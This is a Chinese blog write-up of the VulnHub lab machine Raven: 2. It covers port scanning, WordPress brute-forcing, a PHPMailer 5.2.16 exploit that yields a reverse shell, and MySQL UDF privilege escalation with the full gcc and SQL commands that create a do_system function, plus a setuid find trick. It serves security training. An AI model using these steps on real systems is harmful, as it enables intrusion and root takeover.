投稿
  1. 首页
  2. 随笔

vulnhub靶机-Raven: 2

吉安一中 2022-12-12 随笔 阅读 25

vulnhub靶机-Raven: 2,第1张

vulnhub靶机-Raven: 2

 1、找到靶机ip:192.168.134.130

nmap -sn 192.168.134.0/24

 

 2、扫描靶机端口,开放22、80、111和33222端口

┌──(rootcracer)-[~]
└─# nmap -p- -A 192.168.134.130
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for raven.local (192.168.134.130)
Host is up (0.00055s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
|   2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
|   256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_  256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Raven Security
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33222/tcp   status
|   100024  1          45202/udp6  status
|   100024  1          47710/tcp6  status
|_  100024  1          51475/udp   status
33222/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:38:9F:A5 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.55 ms raven.local (192.168.134.130)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.83 seconds

3、访问80端口,默认页面没什么有用的信息,开始扫描目录

         发现一个wordpress网站,访问之后会跳转到raven.local,添加到hosts文件就开始wpscan常规 *** 作,爆破用户名和密码,然后就把它放到一边等待,继续查看其它目录

 

 4、在vendor目录下发现SECURITY.md文件,里面有哪一年的某个版本的PHPMailer容易受到攻击,接着在VERSION中发现版本号位5.2.16

 在kali中搜索相关漏洞利用脚本,发现40974.py脚本符合版本要求

 脚本需要进行一些修改,需要知道网站的绝对路径,能够在前面vendor下的PATH中能够得到flag1和网站的绝对路径

 需要修改的地方如下

使用python3运行脚本,然后监听本地的4444端口,访问根目录下的craker.php文件,成功反dshell,python提权到tty

 

 使用find命令搜索一下flag文件,得到flag2和flag3

 

 5、提权

最后一个flag应该就是在root目录下了,提权方法是用到mysql的udf提权

在wordpress目录下的wp-config.php文件中能得到mysql的用户名和密码root/R@v3nSecurity,查看mysql的版本发现是5.5.60

 kali搜索mysql udf利用脚本,使用1518.c

 先使用下列命令在本地生成so文件

$ gcc -g -c 1518.c
$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so 1518.o -lc

然后下载到靶机上,方法讲了比较多了,这里不赘述,然后使用下列命令在mysql中创建函数

 * $ mysql -u root -p
 * Enter password:R@v3nSecurity
 * [...]
 * mysql> use mysql;
 * mysql> create table foo(line blob);
 * mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
 * mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';  //跟脚本路径不同
 * mysql> create function do_system returns integer soname 'raptor_udf2.so';
 * mysql> select * from mysql.func;

然后利用该函数给find命令赋予s权限

 

最后通过find命令提权,获得flag4

 

 

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zaji/5503230.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
吉安一中 吉安一中 一级用户组
0 0
上一篇 2022-12-12
下一篇 2022-12-13

发表评论

登录后才能评论

评论列表(0条)

保存